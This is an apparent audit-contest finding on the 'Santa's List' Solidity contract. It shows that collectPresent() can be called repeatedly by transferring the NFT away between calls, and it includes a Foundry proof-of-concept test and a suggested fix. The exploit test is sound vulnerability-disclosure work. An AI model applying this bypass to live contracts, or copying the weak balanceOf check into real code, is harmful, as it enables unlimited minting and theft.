First Flight #5: Santa's List
First Flight #5
Beginner FriendlyFoundry
100 EXP
View results
Previous Next
Submission Details
Severity: high
Valid

Can collect present multi-time with only a address

0xfuluz

Summary

Attacker can collect presents many time without limit with only one valid address.

Vulnerability Details

function collectPresent() limit user only collect 1 time with 1 valid address with condition check balance of address : if (balanceOf(msg.sender) > 0) , but attacker can bypass easy by send token to another address before call collectPresent() again.

Test code for POC:

unction testCanCollectPresentAfterAlreadyCollected() public {
vm.startPrank(santa);
santasList.checkList(user, SantasList.Status.NICE);
santasList.checkTwice(user, SantasList.Status.NICE);
vm.stopPrank();
vm.warp(santasList.CHRISTMAS_2023_BLOCK_TIME() + 1);
vm.startPrank(user);
santasList.collectPresent();
// transfer nft to user2
santasList.safeTransferFrom(user, user2, 0);
// collect present again
santasList.collectPresent();
// transfer nft to user2
santasList.safeTransferFrom(user, user2, 1);
// collect present again
santasList.collectPresent();
}

Impact

Attacker can mint unlimit amount nft santasList and santasToken

Tools Used

Manual Review & Foundry

Recommendations

Implement a mapping address with status collected to record that address have call collectPresent() or not, ex: mapping(address => bool) collectedPreson

Updates

Lead Judging Commences

inallhonesty Lead Judge over 1 year ago
Submission Judgement Published
Validated
Assigned finding tags:

Weak Already Collected Check

Relying on balanceOf > 0 in collectPresent() allows the msg.sender to send their present to another address and then collect again.

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.